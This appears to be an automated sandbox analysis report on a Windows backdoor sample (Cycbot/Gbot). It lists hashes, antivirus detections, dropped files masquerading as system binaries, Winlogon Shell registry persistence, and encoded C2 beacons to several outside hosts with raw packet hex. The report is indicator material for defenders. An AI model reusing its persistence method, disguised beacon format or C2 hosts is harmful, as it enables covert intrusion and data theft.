Analysis Date2014-12-20 01:05:39
MD5e9936daff9939762bfcd33d33e94f269
SHA101029b8f78dd2e3965716dd67167f275ee5a30d4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: ee4244e87b9465b585627315e3cbb221 sha1: f0687822868238594a83b927ebada017e3da9bbd size: 111104
Section.tls md5: 72aa6143776eb23503bdc5c4821c8a62 sha1: 0e98bf7490f70d26e86bce9751b699429d3b894a size: 1024
Section.data md5: 50df714e0fb672ec2e71b375fe86f575 sha1: 968bb1740f4347d3581768b2c1ee2e7acdaabf6d size: 69632
Section.reloc md5: a98ef833c9ef0baa5ed73f52b3c02fe2 sha1: 3c580e82233fd62c4378c8af9bea57daa569f178 size: 1024
Timestamp2005-11-05 19:40:20
PEhash889914cffb89540dc7c01962b141afbef7274244
IMPhash49ec966672a889ca062312d9eeffa2e9
AV360 SafeGen:Variant.Kazy.36919
AVAd-AwareGen:Variant.Kazy.36919
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.36919
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.36919
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Gbot-658
AVDr. WebTrojan.DownLoader4.52453
AVEmsisoftGen:Variant.Kazy.36919
AVEset (nod32)Win32/Kryptik.SPV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Variant.Kazy.36919
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.oce
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.36919
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSyourvideoportal.com
Winsock DNSonlinemediaresource.com
Winsock DNSgravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSgravatar.com
Type: A
192.0.80.240
DNSonlinemediaresource.com
Type: A
54.208.78.194
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourvideoportal.com
Type: A
54.209.168.250
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v63=51&tq=gKZEtzypOwMiQiH2DAKYb8Nv2L8H%2F%2B6HSQmjh8dSWRAD5H3LVU2jW7%2BQ2lniYyeh0RqF1OzlfsEy10QlaMz22L7PbMnApCu0vLDkSHYKzqhZMQarbRL7DWLUvqDJ4U0nJl8oBNUpYzeeGEeFgKFYFB2H4nDlOT3iLHa5IIwqXuDrq3ibxgq3D3EQ%2Frv9zlAN9bn%2Fviz24DZnBSxVW7B%2FGe%2BXMdQ3vyWQmGqjAAmzDbm6T8QbWCSYWerFnlt8JjBTPzrLBNPKAe1LoeJV7emp7gUAXsO1KgJ%2BBIzg8u4j20LEI
User-Agent: mozilla/2.0
HTTP GEThttp://onlinemediaresource.com/blog/images/3521.jpg?v39=10&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GEThttp://yourvideoportal.com/blog/images/3521.jpg?v61=48&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNwlKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.241:80
Flows TCP192.168.1.1:1032 ➝ 54.208.78.194:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 54.209.168.250:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626531 3f763633   bcfe64067be1?v63
0x00000040 (00064)   3d353126 74713d67 4b5a4574 7a79704f   =51&tq=gKZEtzypO
0x00000050 (00080)   774d6951 69483244 414b5962 384e7632   wMiQiH2DAKYb8Nv2
0x00000060 (00096)   4c384825 32462532 42364853 516d6a68   L8H%2F%2B6HSQmjh
0x00000070 (00112)   38645357 52414435 48334c56 55326a57   8dSWRAD5H3LVU2jW
0x00000080 (00128)   37253242 51326c6e 69597965 68305271   7%2BQ2lniYyeh0Rq
0x00000090 (00144)   46314f7a 6c667345 79313051 6c614d7a   F1OzlfsEy10QlaMz
0x000000a0 (00160)   32324c37 50624d6e 41704375 30764c44   22L7PbMnApCu0vLD
0x000000b0 (00176)   6b534859 4b7a7168 5a4d5161 7262524c   kSHYKzqhZMQarbRL
0x000000c0 (00192)   3744574c 55767144 4a345530 6e4a6c38   7DWLUvqDJ4U0nJl8
0x000000d0 (00208)   6f424e55 70597a65 65474565 46674b46   oBNUpYzeeGEeFgKF
0x000000e0 (00224)   59464232 48346e44 6c4f5433 694c4861   YFB2H4nDlOT3iLHa
0x000000f0 (00240)   35494977 71587544 72713369 62786771   5IIwqXuDrq3ibxgq
0x00000100 (00256)   33443345 51253246 7276397a 6c414e39   3D3EQ%2Frv9zlAN9
0x00000110 (00272)   626e2532 4676697a 3234445a 6e425378   bn%2Fviz24DZnBSx
0x00000120 (00288)   56573742 25324647 65253242 584d6451   VW7B%2FGe%2BXMdQ
0x00000130 (00304)   33767957 516d4771 6a41416d 7a44626d   3vyWQmGqjAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7633 393d3130   /3521.jpg?v39=10
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313756 3635724a   0ejbwvgS917V65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6f6e6c69 6e656d65 64696172 65736f75   onlinemediaresou
0x00000090 (00144)   7263652e 636f6d0d 0a416363 6570743a   rce.com..Accept:
0x000000a0 (00160)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000b0 (00176)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000000c0 (00192)   0a44574c 55767144 4a345530 6e4a6c38   .DWLUvqDJ4U0nJl8
0x000000d0 (00208)   6f424e55 70597a65 65474565 46674b46   oBNUpYzeeGEeFgKF
0x000000e0 (00224)   59464232 48346e44 6c4f5433 694c4861   YFB2H4nDlOT3iLHa
0x000000f0 (00240)   35494977 71587544 72713369 62786771   5IIwqXuDrq3ibxgq
0x00000100 (00256)   33443345 51253246 7276397a 6c414e39   3D3EQ%2Frv9zlAN9
0x00000110 (00272)   626e2532 4676697a 3234445a 6e425378   bn%2Fviz24DZnBSx
0x00000120 (00288)   56573742 25324647 65253242 584d6451   VW7B%2FGe%2BXMdQ
0x00000130 (00304)   33767957 516d4771 6a41416d 7a44626d   3vyWQmGqjAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 584d6451   n: close....XMdQ
0x00000130 (00304)   33767957 516d4771 6a41416d 7a44626d   3vyWQmGqjAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a 6a41416d 7a44626d   </html>.jAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 313d3438   /3521.jpg?v61=48
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313758 3635724a   0ejbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   796f7572 76696465 6f706f72 74616c2e   yourvideoportal.
0x00000090 (00144)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000a0 (00160)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000b0 (00176)   7a696c6c 612f322e 300d0a0d 0a210a20   zilla/2.0....!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 6a41416d 7a44626d   </html>.jAAmzDbm
0x00000140 (00320)   36543851 62574353 59576572 466e6c74   6T8QbWCSYWerFnlt
0x00000150 (00336)   384a6a42 54507a72 4c424e50 4b416531   8JjBTPzrLBNPKAe1
0x00000160 (00352)   4c6f654a 5637656d 70376755 4158734f   LoeJV7emp7gUAXsO
0x00000170 (00368)   314b674a 25324242 497a6738 75346a32   1KgJ%2BBIzg8u4j2
0x00000180 (00384)   304c4549 20485454 502f312e 300d0a43   0LEI HTTP/1.0..C
0x00000190 (00400)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000001a0 (00416)   0d0a486f 73743a20 67726176 61746172   ..Host: gravatar
0x000001b0 (00432)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000001c0 (00448)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000001d0 (00464)   6f7a696c 6c612f32 2e300d0a 0d0a       ozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
